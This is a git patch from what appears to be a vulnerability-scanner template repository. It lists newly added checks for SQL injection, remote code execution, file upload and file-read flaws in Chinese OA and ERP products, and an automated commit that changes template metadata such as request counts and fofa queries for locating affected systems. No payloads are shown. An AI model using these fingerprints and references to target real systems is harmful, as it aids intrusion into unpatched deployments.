+http/vulnerabilities/other/cloud-oa-system-sqli.yaml:9e6f8dc3b4078d0be892f841a1ee983333fc2f90
+http/vulnerabilities/other/cmseasy-crossall-act-sqli.yaml:9201e395760aae85ec2377e68900b2db53b4ce9f
 http/vulnerabilities/other/coldfusion-debug-xss.yaml:e95f8dac229f56be4ae422603ada8b5e586d7c94
+http/vulnerabilities/other/comai-ras-cookie-bypass.yaml:5aff5892b67c28f4dc594b23fc895d2c50e50193
 http/vulnerabilities/other/commax-biometric-auth-bypass.yaml:f9ce7cefadd26aaaa56f381810439df363829593
 http/vulnerabilities/other/commax-credentials-disclosure.yaml:0ca9da78f9254620e94a29e437c765ab79173a44
 http/vulnerabilities/other/comtrend-password-exposure.yaml:3096ed8f45dc66d5ee6d359283eb4a5e762bca2c
@@ -6531,6 +6551,7 @@ http/vulnerabilities/other/huatian-oa8000-sqli.yaml:8a4f5357c7b53e77af41945d6c4e
 http/vulnerabilities/other/huawei-hg659-lfi.yaml:153ac378223f36a765f5c11859f9686588ef96cd
 http/vulnerabilities/other/huawei-router-auth-bypass.yaml:02e9cdbfe7a617cc9bd386b768c9cb87cb307828
 http/vulnerabilities/other/huijietong-cloud-fileread.yaml:8837f0510adff944c21b7a8bd834d8fb26b324d9
+http/vulnerabilities/other/huiwen-bibliographic-info-leak.yaml:85af2d6b7d3ad44c81486bd32525c591071a5cb8
 http/vulnerabilities/other/icewarp-open-redirect.yaml:3c0950d121344dce646aa7c44e5cf26797cf57d1
 http/vulnerabilities/other/icewarp-webclient-rce.yaml:a6173da20141f99f9999e920929bb6427b3f710d
 http/vulnerabilities/other/inspur-clusterengine-rce.yaml:6a41c5362bd90bcc2c274d23d09b830b4fea7ff8
@@ -6633,10 +6654,12 @@ http/vulnerabilities/other/rundeck-log4j.yaml:f8b3929499e90a61ebd33b1d38aaa59c43
 http/vulnerabilities/other/sangfor-cphp-rce.yaml:bd4c5d106f68364176aef77bc77e2d6717c5e590
 http/vulnerabilities/other/sangfor-download-lfi.yaml:59f5b86ddcae473249635ef557de06891505bd3b
 http/vulnerabilities/other/sangfor-sysuser-conf.yaml:825d22cfe7e5c41f0f78bd236c775577e32300fc
+http/vulnerabilities/other/sanhui-smg-file-read.yaml:bd74f2aa6049e47fbb274a302191599b52b1061c
 http/vulnerabilities/other/sap-redirect.yaml:47a5370349446eee54ad22c333d902cd82c73e30
 http/vulnerabilities/other/sar2html-rce.yaml:f1760b0bcbdfd892a53c31fadee6d698b6503c0f
 http/vulnerabilities/other/seacms-rce.yaml:eaa2ae8e9b835a93b7a091a91f083e519ed4603c
 http/vulnerabilities/other/seacms-sqli.yaml:052b91b996a94cf994e484e2f7fc89dad65c3f89
+http/vulnerabilities/other/seeyon-oa-log4j.yaml:23d122a7efd048ef6cde43da18a428da06983c98
 http/vulnerabilities/other/seowon-router-rce.yaml:87ffab8cf0b6a16ff367c867ff85393e465e6529
 http/vulnerabilities/other/servicenow-helpdesk-credential.yaml:bcda3ec85d9430d886543afd053c6df1e8266d87
 http/vulnerabilities/other/sick-beard-xss.yaml:2914e2859e9e5285409ab4357819862f0f0e6668
@@ -6693,6 +6716,7 @@ http/vulnerabilities/other/yeswiki-stored-xss.yaml:1a0b756a2cb815701ff041b040414
 http/vulnerabilities/other/yeswiki-xss.yaml:8892e257dd4bb9d545d2391b57758d7f6ebafc29
 http/vulnerabilities/other/yishaadmin-lfi.yaml:63820870477ec1ec3e36ab553dd2536c636ea044
 http/vulnerabilities/other/zcms-v3-sqli.yaml:b607ed0e698e35bdb00c28b597876d5e39d996ee
+http/vulnerabilities/other/zhixiang-oa-msglog-sqli.yaml:3a984df962c151a3190a2e8018d8d78d93c3c9d2
 http/vulnerabilities/other/zimbra-preauth-ssrf.yaml:4a19286d996ffe67b723856a635452da05223540
 http/vulnerabilities/other/zms-auth-bypass.yaml:41d103ab6e30613eaa19e243fe466d1b64bcc490
 http/vulnerabilities/other/zms-sqli.yaml:896a7b5c81a24c1d3d538b359ce746a0204ea5f5
@@ -6701,14 +6725,17 @@ http/vulnerabilities/php/php-xdebug-rce.yaml:cf1ce0da8f7c4ea0a2905672df1113e8896
 http/vulnerabilities/phpmyadmin-unauth.yaml:7e7904d758845b3bc5e2b41a776b4ec53297e9fa
 http/vulnerabilities/portainer-init-deploy.yaml:ca873fad7c351f3496bf0c16a36a5b2889b4e970
 http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml:8dae985c08dade5a3c5c4d532aa587f8a8da254f
+http/vulnerabilities/qax/secsslvpn-auth-bypass.yaml:42cee554704f6f55298af07ce6187af0583def82
 http/vulnerabilities/qibocms-file-download.yaml:7763d29c8ae95f8db4ccb87330ef4ba17d612e87
 http/vulnerabilities/rails/rails6-xss.yaml:be4693b2fa2357ea1f472af859b4ad187c08981b
 http/vulnerabilities/ransomware/deadbolt-ransomware.yaml:e5607baf170fc08d2fd0624e52db07ec5f6e845e
+http/vulnerabilities/realor/realor-gwt-system-sqli.yaml:b83ddd93bcfa00a8639078231e80480d1a305c6c
 http/vulnerabilities/rocketchat/unauth-message-read.yaml:f9d0dc61da7d76cd6f03366bebdfe259f35b6ac7
 http/vulnerabilities/royalevent/royalevent-management-xss.yaml:d0b767e7f08117d1fa3a89d8b40e32f3dd8713bf
 http/vulnerabilities/royalevent/royalevent-stored-xss.yaml:3d6127ac472e3c9dd8af375d0fc4d4a9c8059cd6
 http/vulnerabilities/ruijie/ruijie-eg-rce.yaml:63eb5abebc6ec7d0055854820bf6267dfff1b41f
 http/vulnerabilities/ruijie/ruijie-excu-shell.yaml:a4f536339914f668cecbb8e1cd99f01affe9620a
+http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml:7c4f2f0cef2efbe60462a040267e6a89fd7a5f42
 http/vulnerabilities/ruijie/ruijie-networks-lfi.yaml:3982a8ffcf669b467aea0c6399390dd878ee1efc
 http/vulnerabilities/ruijie/ruijie-password-leak.yaml:7d24e3ef4bb5d25b53d03c03351b6a179bd7dba8
 http/vulnerabilities/ruijie-eg-login-rce.yaml:689b4c6366b5be4e4c708ed1d033c34571e9e7f0
@@ -6718,13 +6745,24 @@ http/vulnerabilities/samsung/samsung-wlan-ap-xss.yaml:e42864493d32b170f788e506c5
 http/vulnerabilities/sangfor/sangfor-ba-rce.yaml:a209df79ba30018390c9b073e9a95b04847c7c64
 http/vulnerabilities/sangfor/sangfor-edr-auth-bypass.yaml:70d3869515f570a81f2d02560eded4b993f69c36
 http/vulnerabilities/sangfor/sangfor-edr-rce.yaml:df6a81d61c37ab20465d4813f87996d12bbd13a0
+http/vulnerabilities/sangfor/sangfor-login-rce.yaml:a720ca9db985ab55c9a328fb1107683295fc680a
+http/vulnerabilities/secworld/secgate-3600-file-upload.yaml:a10a424ee80b16c46c842e8cd7d6eec194d6acb8
+http/vulnerabilities/seeyon/seeyon-config-exposure.yaml:c4ab1e1bb2af2486dc550cf27491408bfced8034
+http/vulnerabilities/seeyon/seeyon-createmysql-exposure.yaml:289bf0c8299fb6cdcde2cc1cbee14b10926d3802
+http/vulnerabilities/seeyon/seeyon-initdata-exposure.yaml:7adbccb8f0c02c43bb70f230d9618a73d18895af
+http/vulnerabilities/seeyon/seeyon-oa-fastjson-rce.yaml:ea5b1e62d4a94080dfa827d7d917147dba909538
+http/vulnerabilities/seeyon/seeyon-oa-setextno-sqli.yaml:381f9de7750b738a8f7c95b26ea40b1da090b063
+http/vulnerabilities/seeyon/seeyon-oa-sp2-file-upload.yaml:4c034f6b124528f6b516ebc08c5f4be764413af2
 http/vulnerabilities/seeyon/wooyun-2015-148227.yaml:08ed63eb05031b4eec0254c9378951d0a1195c45
 http/vulnerabilities/seeyon/zhiyuan-file-upload.yaml:6915ee2d00659128d29a47da1b6781e338fc9c5d
 http/vulnerabilities/seeyon/zhiyuan-oa-info-leak.yaml:4682cf1b5cd4d6eb1390de101c2e80ef9d1832ed
 http/vulnerabilities/seeyon/zhiyuan-oa-session-leak.yaml:206e69434dcd7c95483ca9d1c6d77238e5b51b2f
+http/vulnerabilities/shiziyu-cms/shiziyu-cms-apicontroller-sqli.yaml:ddce490ca7998d9bf60d0d297df04d09fc2d05a8
 http/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml:1962b0c186d588742508f73b5134511990e2162d
 http/vulnerabilities/sitecore/sitecore-xml-xss.yaml:414d0c93f794d0a8fb943d2a9ae65feb54d8a350
+http/vulnerabilities/smartbi/smartbi-deserialization.yaml:c6de16a2797b36bbb738cb1395bd0707429b6fcc
 http/vulnerabilities/splash/splash-render-ssrf.yaml:ebc36380b220da7c0a2f6654da0706cc8cca1a9b
+http/vulnerabilities/spring/jolokia-logback-jndi-rce.yaml:e6cfb28d772af6be89abfaa2d7057e35d34d44dc
 http/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml:23a9d66f61a0d2e221d10633b36c41eaca9c6f9d
 http/vulnerabilities/springboot/springboot-h2-db-rce.yaml:61e0b95b13f457f6eb33edd90a0fb385f7a2f6e1
 http/vulnerabilities/springboot/springboot-log4j-rce.yaml:38804d58473315e281db9e543f1612a014364f41
@@ -6739,9 +6777,23 @@ http/vulnerabilities/thinkphp/thinkphp-501-rce.yaml:43f190757d442c2aa7a0aaa76ffc
 http/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml:077583bfac63986d89b0f015675c7d16c7c1866d
 http/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml:130d4c7b7e62bc968ef1418802166df675e65a32
 http/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml:b4084007e891dabf45821aab3bad769da49285af
+http/vulnerabilities/tongda/tongda-action-uploadfile.yaml:47451d892c651c35b17fe6e33e01ea213be55f96
+http/vulnerabilities/tongda/tongda-api-file-upload.yaml:9f3675d01a4767cbc3f9ef74d2deeec7260bbf47
+http/vulnerabilities/tongda/tongda-arbitrary-login.yaml:a8a1a777d23a7d3f8df0348193b6b9466a3852aa
 http/vulnerabilities/tongda/tongda-auth-bypass.yaml:ad7f8991b70d8626f046e282c306a58da79e9d80
+http/vulnerabilities/tongda/tongda-contact-list-exposure.yaml:2d4bb7f9a2ad74b64f8a2fbdf47a3bece2a22252
+http/vulnerabilities/tongda/tongda-getdata-rce.yaml:a73a59cf3f759bb3beff59c61959c8b6f88d8782
+http/vulnerabilities/tongda/tongda-getway-rfi.yaml:0a300cdb173e4a5c3f16ce5c5524cf5ec0690b15
+http/vulnerabilities/tongda/tongda-insert-sqli.yaml:959f9d2ca61dac8691d4730391efd2d4b5a63ac7
+http/vulnerabilities/tongda/tongda-login-code-authbypass.yaml:dfa3b527ecea06b0571f6055ad9633401e056471
+http/vulnerabilities/tongda/tongda-meeting-unauth.yaml:a321424b18abe31c25b47436099012bca10ee5a6
+http/vulnerabilities/tongda/tongda-oa-swfupload-sqli.yaml:c2eea5392be483c7b63870582ad3d5592d352153
 http/vulnerabilities/tongda/tongda-path-traversal.yaml:1adaeb049038fb9b6a3cba8bfc41b40866d35d0b
+http/vulnerabilities/tongda/tongda-report-func-sqli.yaml:98460190adf8a3cdbb7ca5c7b4ccf409e9ae786e
 http/vulnerabilities/tongda/tongda-session-disclosure.yaml:9ab8de0c9ba380229cb61d4f749eaafea23f64c7
+http/vulnerabilities/tongda/tongda-video-file-read.yaml:26dcb94fba52fefeff626733e6bf76225bee0566
+http/vulnerabilities/topsec/topsec-topacm-rce.yaml:c87fadea2b5535ee66a34a6d452f1ac02dbaa65a
+http/vulnerabilities/topsec/topsec-topapplb-auth-bypass.yaml:d8f2c29898a5223a7f913df5f67ef11ca44195fe
 http/vulnerabilities/ueditor/ueditor-ssrf.yaml:59f1815fd6ff8314541d7c8b9a64766064ae2dcd
 http/vulnerabilities/ueditor/ueditor-xss.yaml:1f3fd8ac6e5c9609feb4fe1af9076cfc55a08e49
 http/vulnerabilities/vbulletin/arcade-php-sqli.yaml:0525410ad7ce820e401f4ccc287476aa53371b0e
@@ -6757,15 +6809,46 @@ http/vulnerabilities/vmware/vmware-vcenter-lfi.yaml:a96cb9f082ddd0851f8f2ece4b7c
 http/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml:583a9a380a0216cae167c2bd38bae34bcd5334e1
 http/vulnerabilities/vmware/vmware-vcenter-ssrf.yaml:a74604d9701e772e3d49873a13ecc48cb8fc0f9a
 http/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml:ea3c3cf2c63bd3e65ca158fb39c193d6eaf8e34b
+http/vulnerabilities/wanhu/wanhu-documentedit-sqli.yaml:7a72a525e6dbff4cd90854942510cad6343696cc
+http/vulnerabilities/wanhu/wanhu-download-ftp-file-read.yaml:b59b9978a830499d865c6ca67e88fb6d9f976bea
+http/vulnerabilities/wanhu/wanhu-download-old-file-read.yaml:8054592e767463fad4f11959dc8addb9ade4571a
+http/vulnerabilities/wanhu/wanhu-oa-fileupload-controller-arbitrary-file-upload.yaml:a3c1be64103c24529b998a1694e85b78f2ec0a5d
+http/vulnerabilities/wanhu/wanhu-teleconferenceservice-xxe.yaml:cee199e7f19bfc42c50957798dc8c7f4dba66f32
+http/vulnerabilities/wanhu/wanhuoa-officeserverservlet-file-upload.yaml:a37db3e5c542051846b573281fe7e54f7a8679e7
+http/vulnerabilities/wanhu/wanhuoa-smartupload-file-upload.yaml:66c03db4daeae915b58ba1b831e589db56302583
 http/vulnerabilities/weaver/ecology/ecology-arbitrary-file-upload.yaml:0a3d63055a1c1f33e5300eb88a9fc1ecfc245928
 http/vulnerabilities/weaver/ecology/ecology-filedownload-directory-traversal.yaml:ae1c04ba45dc3c1cfd1b403e90856f3db430a82a
 http/vulnerabilities/weaver/ecology/ecology-mysql-config.yaml:1320d348735dd65472613cefdac4c7618bd312dd
+http/vulnerabilities/weaver/ecology/ecology-oa-byxml-xxe.yaml:de69eec2859747bb35be4421377ef134a2ac8940
 http/vulnerabilities/weaver/ecology/ecology-springframework-directory-traversal.yaml:b64e0c558600ff0d335b85bbe9b391fed4aed2cd
 http/vulnerabilities/weaver/ecology/ecology-syncuserinfo-sqli.yaml:d2365b7d9e05b637a00890dc2e6123da13d812f9
 http/vulnerabilities/weaver/ecology/ecology-v8-sqli.yaml:883c99908c9e6ba6a9f3c2ff770db9325c581cd9
+http/vulnerabilities/weaver/ecology-jqueryfiletree-traversal.yaml:5a8687ea04fa86363e9b80705fc82ef7bf7e0a7f
+http/vulnerabilities/weaver/ecology-verifyquicklogin-auth-bypass.yaml:5dac231d8d44106c90263f0054970352b691448a
 http/vulnerabilities/weaver/eoffice/weaver-eoffice-file-upload.yaml:b596abf62e41fc06ca8433f40ba1481c6ca04a46
 http/vulnerabilities/weaver/oa-v9-uploads-file.yaml:4f2e2a86334334b312281ca9e804aff5de3f2d47
+http/vulnerabilities/weaver/weaver-checkserver-sqli.yaml:2330b779ab6969c9bb48cefb135ebdf2067e70f9
+http/vulnerabilities/weaver/weaver-e-cology-validate-sqli.yaml:201af8269a05275a78f2cc15b4d33380a9ff1021
+http/vulnerabilities/weaver/weaver-e-mobile-rce.yaml:c90b6c2be92e5ccc10e165b45cb9402d8eb9818c
+http/vulnerabilities/weaver/weaver-ebridge-lfi.yaml:5232d4eeeb4d924e3d8d6b2aa2e133c5c886ec90
+http/vulnerabilities/weaver/weaver-ecology-bshservlet-rce.yaml:4f98ed8b3cd0d8c30550fe9f2acf5daf5cb90481
+http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml:7eff295385c5b8ae647f97529e9b184aae488ab9
+http/vulnerabilities/weaver/weaver-ecology-hrmcareer-sqli.yaml:19032d48c04c1b62e9933766c467d0bec612a191
+http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml:c63c29f70b599d39b058b7d3fe1fb2ffc51a70aa
+http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml:a0b32a94e97ef8af2c7f3846270609270f0b2975
+http/vulnerabilities/weaver/weaver-ktreeuploadaction-file-upload.yaml:bdfe7e87cc5e3148a954db01151eb37ee12cfcf6
+http/vulnerabilities/weaver/weaver-lazyuploadify-file-upload.yaml:cffb69e39876c376a3c1a2f6c1e64526f5c2fe27
+http/vulnerabilities/weaver/weaver-login-sessionkey.yaml:69d024fc7db352b4adad3e5f6b8f1657b09d9600
+http/vulnerabilities/weaver/weaver-mysql-config-info-leak.yaml:ca68e5bcb398d8e8e6f935d4fa9a49dd2649e61f
+http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml:51eebced18af7fc6ea1fa4381963b2b6173c488c
+http/vulnerabilities/weaver/weaver-officeserver-lfi.yaml:d6ad9700c46a3338469274811a4bf20118b262f2
+http/vulnerabilities/weaver/weaver-signaturedownload-lfi.yaml:847df800aa8addc484e1af216c5aaa7eac938ec1
+http/vulnerabilities/weaver/weaver-sptmforportalthumbnail-lfi.yaml:4c76db9cf38b9ed9045f12c87a13cda4f2683655
+http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml:9b1ae29722f532c60067309a332d6c15e4b1fb0b
+http/vulnerabilities/weaver/weaver-uploadoperation-file-upload.yaml:6e204dd6196d40a46cb082bc583f17541acacf05
+http/vulnerabilities/weaver/weaver-userselect-unauth.yaml:75455582d8ea35f3ada4fb5dd4f8667e5f239b70
 http/vulnerabilities/webp-server-go/webp-server-go-lfi.yaml:d1f9ee70aae38699a3002ec5e02073fba05af3ea
+http/vulnerabilities/wechat/wechat-info-leak.yaml:d7ea85dc1c11def732c93cf36d72fdafc3892304
 http/vulnerabilities/wordpress/3d-print-lite-xss.yaml:c734362732a3c1589beda39fa1e2fdd1174f104f
 http/vulnerabilities/wordpress/3dprint-arbitrary-file-upload.yaml:188922af0850946cbbf0d092d0c1fb9abc0deb1a
 http/vulnerabilities/wordpress/404-to-301-xss.yaml:18c5efd5b683d0204c4d026e7d4ca5e09590017b
@@ -6927,8 +7010,26 @@ http/vulnerabilities/wordpress/wpmudev-pub-keys.yaml:6cbcd6ec4668c5ed28b25aad480
 http/vulnerabilities/wordpress/wptouch-open-redirect.yaml:ceda882686a89a04ea635ec92795eac9f9bdfbad
 http/vulnerabilities/wordpress/wptouch-xss.yaml:e5a158d8001c2d41285ca9ab7c0d9cf41a7a6f8d
 http/vulnerabilities/wordpress/zero-spam-sql-injection.yaml:f83958ffb14e4cbea5ebaaa928a9ae19615df61e
+http/vulnerabilities/yonyou/chanjet-gnremote-sqli.yaml:e84c6a43591f387d35f294cc5389d6bad6c1bc9c
+http/vulnerabilities/yonyou/chanjet-tplus-checkmutex-sqli.yaml:7416627bb060c5a443d0da18416809d7576a9efa
+http/vulnerabilities/yonyou/chanjet-tplus-file-read.yaml:79379dad0faf98aa977877f3ab3e14cf86ed3bc6
+http/vulnerabilities/yonyou/chanjet-tplus-fileupload.yaml:af883dc5b8711d83ca2e4a5b798f80241c6d47c7
+http/vulnerabilities/yonyou/chanjet-tplus-rce.yaml:16ea8e8ba575c39bc5ebd781a2ec463376aed3c8
+http/vulnerabilities/yonyou/chanjet-tplus-ufida-sqli.yaml:d4b9a4ed83d71e51352c6bfa69e5f4f10fd0b906
 http/vulnerabilities/yonyou/erp-nc-directory-traversal.yaml:82c982f899ffeb1dc9ee409a10191f7436dedd46
+http/vulnerabilities/yonyou/grp-u8-uploadfiledata-fileupload.yaml:056f66c3d560c8072c05fcac027511a92ca4ece3
 http/vulnerabilities/yonyou/wooyun-path-traversal.yaml:9e57b135c251528e960e3a620a55778cb5b75f43
+http/vulnerabilities/yonyou/yonyou-fe-directory-traversal.yaml:49a38ee1972eeeea8a2982e299b7d70b01cdb253
+http/vulnerabilities/yonyou/yonyou-filereceiveservlet-fileupload.yaml:dcacf81350b023ed4c36db5f153d56f4902faac7
+http/vulnerabilities/yonyou/yonyou-grp-u8-xxe.yaml:a784cd370301919c8311f72cd72c1ce72353333c
+http/vulnerabilities/yonyou/yonyou-nc-accept-fileupload.yaml:d425f0b6ed4fb12f6718c0cc378381fa0c7fd751
+http/vulnerabilities/yonyou/yonyou-nc-baseapp-deserialization.yaml:d3218dbf2b9d30bb1703168b16d66e895918b803
+http/vulnerabilities/yonyou/yonyou-nc-dispatcher-fileupload.yaml:e226605eccccdff5bd9aaf586b6ce6e25497ca15
+http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml:c58cb21936813e633196368e5216932756501c2d
+http/vulnerabilities/yonyou/yonyou-nc-info-leak.yaml:6a325f6a45baebdac3c4652c2cf6483d7d67ad6a
+http/vulnerabilities/yonyou/yonyou-nc-ncmessageservlet-rce.yaml:9eb7a48b10cd1cd5c7c4cf12d9402a2aab9c899c
+http/vulnerabilities/yonyou/yonyou-u8-crm-fileupload.yaml:c28ad67185dfb1c66f6c8b4569ce1f903769e176
+http/vulnerabilities/yonyou/yonyou-u8-crm-lfi.yaml:a6bf00d1879bbcbfaef9b523ec4cd4d0eda3dcac
 http/vulnerabilities/yonyou/yonyou-u8-oa-sqli.yaml:e7e8bf6bd2bc78efd9ceb6d04b5f0b689fb16764
 http/vulnerabilities/zend/zend-v1-xss.yaml:625c68da0d08d6c8a1381704b3861de7b6ffad6f
 http/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml:d81ad79707b746a46d8dbf3825df18da17aba5bf
@@ -7078,7 +7179,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:e214969d4e15aa9b8fe4aed559e5bc325b412caf
+templates-checksum.txt:a3f9a0c229ba7f886a9e79b7f447f5f82e96005a
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From aa3659d49d8b3a9d6baa0443c2232dbdc169c98a Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Mon, 18 Sep 2023 12:45:28 +0000
Subject: [PATCH 0429/1090] TemplateMan Update [Mon Sep 18 12:45:28 UTC 2023]
 :robot:

---
 http/cnvd/2023/CNVD-C-2023-76801.yaml                       | 2 ++
 http/default-logins/smartbi/smartbi-default-login.yaml      | 2 +-
 http/vulnerabilities/realor/realor-gwt-system-sqli.yaml     | 4 ++--
 http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml      | 2 +-
 http/vulnerabilities/secworld/secgate-3600-file-upload.yaml | 4 ++--
 .../vulnerabilities/seeyon/seeyon-createmysql-exposure.yaml | 2 +-
 http/vulnerabilities/seeyon/seeyon-oa-sp2-file-upload.yaml  | 2 +-
 http/vulnerabilities/smartbi/smartbi-deserialization.yaml   | 2 +-
 http/vulnerabilities/tongda/tongda-action-uploadfile.yaml   | 4 ++--
 http/vulnerabilities/tongda/tongda-api-file-upload.yaml     | 2 +-
 http/vulnerabilities/tongda/tongda-getway-rfi.yaml          | 2 +-
 http/vulnerabilities/tongda/tongda-insert-sqli.yaml         | 4 ++--
 .../vulnerabilities/topsec/topsec-topapplb-auth-bypass.yaml | 4 ++--
 .../weaver/ecology-verifyquicklogin-auth-bypass.yaml        | 1 +
 .../weaver/weaver-e-cology-validate-sqli.yaml               | 2 ++
 http/vulnerabilities/weaver/weaver-ebridge-lfi.yaml         | 6 +++---
 .../weaver/weaver-ecology-bshservlet-rce.yaml               | 6 +++---
 http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml      | 2 +-
 http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml  | 2 +-
 .../weaver/weaver-lazyuploadify-file-upload.yaml            | 2 +-
 http/vulnerabilities/weaver/weaver-login-sessionkey.yaml    | 2 +-
 .../weaver/weaver-office-server-file-upload.yaml            | 2 +-
 .../weaver/weaver-uploadify-file-upload.yaml                | 2 +-
 .../weaver/weaver-uploadoperation-file-upload.yaml          | 1 +
 http/vulnerabilities/yonyou/chanjet-tplus-rce.yaml          | 1 +
 .../yonyou/yonyou-fe-directory-traversal.yaml               | 6 +++---
 .../yonyou/yonyou-filereceiveservlet-fileupload.yaml        | 2 +-
 http/vulnerabilities/yonyou/yonyou-grp-u8-xxe.yaml          | 2 ++
 .../yonyou/yonyou-nc-dispatcher-fileupload.yaml             | 1 +
 29 files changed, 43 insertions(+), 33 deletions(-)

diff --git a/http/cnvd/2023/CNVD-C-2023-76801.yaml b/http/cnvd/2023/CNVD-C-2023-76801.yaml
index dac7a8f899..daab9ea654 100644
--- a/http/cnvd/2023/CNVD-C-2023-76801.yaml
+++ b/http/cnvd/2023/CNVD-C-2023-76801.yaml
@@ -5,6 +5,8 @@ info:
   author: SleepingBag945
   severity: critical
   description: There is an arbitrary method calling vulnerability in UFIDA NC and NCC systems. By exploiting the vulnerability through uapjs (jsinvoke), dangerous methods can be called to cause attacks.
+  metadata:
+    max-request: 2
   tags: cvnd,cvnd2023,yonyou,rce
 
 http:
diff --git a/http/default-logins/smartbi/smartbi-default-login.yaml b/http/default-logins/smartbi/smartbi-default-login.yaml
index 5981281965..b6cf8d519c 100755
--- a/http/default-logins/smartbi/smartbi-default-login.yaml
+++ b/http/default-logins/smartbi/smartbi-default-login.yaml
@@ -11,8 +11,8 @@ info:
     - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/smartbi-default-user-weakpass.yaml
     - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Smartbi%20%E7%99%BB%E5%BD%95%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E.md
   metadata:
-    max-request: 1
     fofa-query: app="SMARTBI"
+    max-request: 2
     verified: true
   tags: smartbi,default-login
 
diff --git a/http/vulnerabilities/realor/realor-gwt-system-sqli.yaml b/http/vulnerabilities/realor/realor-gwt-system-sqli.yaml
index d26a0d23a8..912ae972da 100644
--- a/http/vulnerabilities/realor/realor-gwt-system-sqli.yaml
+++ b/http/vulnerabilities/realor/realor-gwt-system-sqli.yaml
@@ -9,9 +9,9 @@ info:
   reference:
     - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/realor-gwt-system-sql-injection.yaml
   metadata:
+    fofa-query: app="REALOR-天翼应用虚拟化系统"
+    max-request: 2
     verified: "true"
-    fofa-query: 'app="REALOR-天翼应用虚拟化系统"'
-    max-request: 1
   tags: realor,sqli
 
 http:
diff --git a/http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml b/http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml
index 593ee80e26..d32b173967 100644
--- a/http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml
+++ b/http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml
@@ -8,8 +8,8 @@ info:
   reference:
     - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/ruijie-nbr-fileupload.yaml
   metadata:
-    max-request: 1
     fofa-query: app="Ruijie-NBR路由器"
+    max-request: 2
     verified: true
   tags: ruijie,file-upload,intrusive,nbr
 
diff --git a/http/vulnerabilities/secworld/secgate-3600-file-upload.yaml b/http/vulnerabilities/secworld/secgate-3600-file-upload.yaml
index 707562c31c..c836cc43eb 100644
--- a/http/vulnerabilities/secworld/secgate-3600-file-upload.yaml
+++ b/http/vulnerabilities/secworld/secgate-3600-file-upload.yaml
@@ -10,9 +10,9 @@ info:
     - https://peiqi.wgpsec.org/wiki/iot/%E5%A5%87%E5%AE%89%E4%BF%A1/%E7%BD%91%E7%A5%9E%20SecGate%203600%20%E9%98%B2%E7%81%AB%E5%A2%99%20obj_app_upfile%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html
     - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/%E5%A5%87%E5%AE%89%E4%BF%A1/%E7%BD%91%E7%A5%9E%20SecGate%203600%20%E9%98%B2%E7%81%AB%E5%A2%99%20obj_app_upfile%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md
   metadata:
+    fofa-query: fid="1Lh1LHi6yfkhiO83I59AYg=="
+    max-request: 2
     verified: "true"
-    fofa-query: 'fid="1Lh1LHi6yfkhiO83I59AYg=="'
-    max-request: 1
   tags: secgate,3600,firewall,file-upload,intrusive
 
 variables:
diff --git a/http/vulnerabilities/seeyon/seeyon-createmysql-exposure.yaml b/http/vulnerabilities/seeyon/seeyon-createmysql-exposure.yaml
index 3752233213..bac902e8ca 100755
--- a/http/vulnerabilities/seeyon/seeyon-createmysql-exposure.yaml
+++ b/http/vulnerabilities/seeyon/seeyon-createmysql-exposure.yaml
@@ -10,8 +10,8 @@ info:
     - https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java
     - https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E8%87%B4%E8%BF%9COA%20A6%20createMysql.jsp%20%E6%95%B0%E6%8D%AE%E5%BA%93%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2.md
   metadata:
-    max-request: 1
     fofa-query: title="致远A8+协同管理软件.A6"
+    max-request: 2
     verified: true
   tags: seeyon,oa,info-leak
 
